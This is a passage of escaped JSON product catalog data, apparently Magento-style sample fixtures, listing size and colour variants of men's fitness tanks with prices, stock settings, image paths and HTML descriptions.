ty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Orange\"},\"584\":{\"sku\":\"MT01-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Erikssen CoolTech&trade; Fitness Tank-M-Red\",\"description\":\"<p>A good running tank helps make the miles pass by keep you cool. The Erikssen CoolTech&trade; Fitness Tank completes that mission, with performance fabric engineered to wick perspiration and promote airflow.<\\/p>\\n<p>&bull; Red performance tank.<br \\/>&bull; Slight scoop neckline. <br \\/>&bull; Reflectivity. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erikssen-cooltech-trade-fitness-tank-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt01-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt01-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt01-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt01-red_alt1.jpg,\\/m\\/t\\/mt01-red_back.jpg\",\"image\":\"\\/m\\/t\\/mt01-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt01-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt01-red_alt1.jpg,\\/m\\/t\\/mt01-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"585\":{\"sku\":\"MT01-L-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Erikssen CoolTech&trade; Fitness Tank-L-Gray\",\"description\":\"<p>A good running tank helps make the miles pass by keep you cool. The Erikssen CoolTech&trade; Fitness Tank completes that mission, with performance fabric engineered to wick perspiration and promote airflow.<\\/p>\\n<p>&bull; Red performance tank.<br \\/>&bull; Slight scoop neckline. <br \\/>&bull; Reflectivity. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erikssen-cooltech-trade-fitness-tank-l-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt01-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt01-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt01-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/t\\/mt01-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt01-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Gray\"},\"586\":{\"sku\":\"MT01-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Erikssen CoolTech&trade; Fitness Tank-L-Orange\",\"description\":\"<p>A good running tank helps make the miles pass by keep you cool. The Erikssen CoolTech&trade; Fitness Tank completes that mission, with performance fabric engineered to wick perspiration and promote airflow.<\\/p>\\n<p>&bull; Red performance tank.<br \\/>&bull; Slight scoop neckline. <br \\/>&bull; Reflectivity. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erikssen-cooltech-trade-fitness-tank-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt01-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt01-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt01-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/t\\/mt01-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt01-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"587\":{\"sku\":\"MT01-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Erikssen CoolTech&trade; Fitness Tank-L-Red\",\"description\":\"<p>A good running tank helps make the miles pass by keep you cool. The Erikssen CoolTech&trade; Fitness Tank completes that mission, with performance fabric engineered to wick perspiration and promote airflow.<\\/p>\\n<p>&bull; Red performance tank.<br \\/>&bull; Slight scoop neckline. <br \\/>&bull; Reflectivity. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erikssen-cooltech-trade-fitness-tank-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt01-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt01-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt01-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt01-red_alt1.jpg,\\/m\\/t\\/mt01-red_back.jpg\",\"image\":\"\\/m\\/t\\/mt01-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt01-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt01-red_alt1.jpg,\\/m\\/t\\/mt01-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"588\":{\"sku\":\"MT01-XL-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Erikssen CoolTech&trade; Fitness Tank-XL-Gray\",\"description\":\"<p>A good running tank helps make the miles pass by keep you cool. The Erikssen CoolTech&trade; Fitness Tank completes that mission, with performance fabric engineered to wick perspiration and promote airflow.<\\/p>\\n<p>&bull; Red performance tank.<br \\/>&bull; Slight scoop neckline. <br \\/>&bull; Reflectivity. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erikssen-cooltech-trade-fitness-tank-xl-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt01-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt01-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt01-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/t\\/mt01-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt01-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Gray\"},\"589\":{\"sku\":\"MT01-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Erikssen CoolTech&trade; Fitness Tank-XL-Orange\",\"description\":\"<p>A good running tank helps make the miles pass by keep you cool. The Erikssen CoolTech&trade; Fitness Tank completes that mission, with performance fabric engineered to wick perspiration and promote airflow.<\\/p>\\n<p>&bull; Red performance tank.<br \\/>&bull; Slight scoop neckline. <br \\/>&bull; Reflectivity. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erikssen-cooltech-trade-fitness-tank-xl-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt01-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt01-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt01-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/t\\/mt01-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt01-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Orange\"},\"590\":{\"sku\":\"MT01-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Erikssen CoolTech&trade; Fitness Tank-XL-Red\",\"description\":\"<p>A good running tank helps make the miles pass by keep you cool. The Erikssen CoolTech&trade; Fitness Tank completes that mission, with performance fabric engineered to wick perspiration and promote airflow.<\\/p>\\n<p>&bull; Red performance tank.<br \\/>&bull; Slight scoop neckline. <br \\/>&bull; Reflectivity. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erikssen-cooltech-trade-fitness-tank-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt01-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt01-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt01-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt01-red_alt1.jpg,\\/m\\/t\\/mt01-red_back.jpg\",\"image\":\"\\/m\\/t\\/mt01-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt01-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt01-red_alt1.jpg,\\/m\\/t\\/mt01-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"591\":{\"sku\":\"MT01\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Erikssen CoolTech&trade; Fitness Tank\",\"description\":\"<p>A good running tank helps make the miles pass by keep you cool. The Erikssen CoolTech&trade; Fitness Tank completes that mission, with performance fabric engineered to wick perspiration and promote airflow.<\\/p>\\n<p>&bull; Red performance tank.<br \\/>&bull; Slight scoop neckline. <br \\/>&bull; Reflectivity. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt01-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt01-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt01-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tank,material=Cotton|HeatTec&reg;|Polyester,pattern=Solid,climate=All-weather|Indoor|Warm,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MT01-XS-Gray,size=XS,color=Gray|sku=MT01-XS-Orange,size=XS,color=Orange|sku=MT01-XS-Red,size=XS,color=Red|sku=MT01-S-Gray,size=S,color=Gray|sku=MT01-S-Orange,size=S,color=Orange|sku=MT01-S-Red,size=S,color=Red|sku=MT01-M-Gray,size=M,color=Gray|sku=MT01-M-Orange,size=M,color=Orange|sku=MT01-M-Red,size=M,color=Red|sku=MT01-L-Gray,size=L,color=Gray|sku=MT01-L-Orange,size=L,color=Orange|sku=MT01-L-Red,size=L,color=Red|sku=MT01-XL-Gray,size=XL,color=Gray|sku=MT01-XL-Orange,size=XL,color=Orange|sku=MT01-XL-Red,size=XL,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt01-red_alt1.jpg,\\/m\\/t\\/mt01-red_back.jpg\",\"image\":\"\\/m\\/t\\/mt01-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt01-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt01-red_alt1.jpg,\\/m\\/t\\/mt01-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tank\",\"material\":\"Cotton|HeatTec&reg;|Polyester\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"592\":{\"sku\":\"MT02-XS-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Tristan Endurance Tank-XS-Gray\",\"description\":\"<p>Push yourself through punishing runs, plyometric workouts, intense competition and more in our athletic Tristan Endurance Tank. Constructed with built-in moisture-wicking technology, it\'s designed to keep you completely cool and dry on the long haul.<\\/p>\\n<p>&bull; White performance tank.<br \\/>&bull; Stylish contrast stitching. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tristan-endurance-tank-xs-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt02-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt02-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt02-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has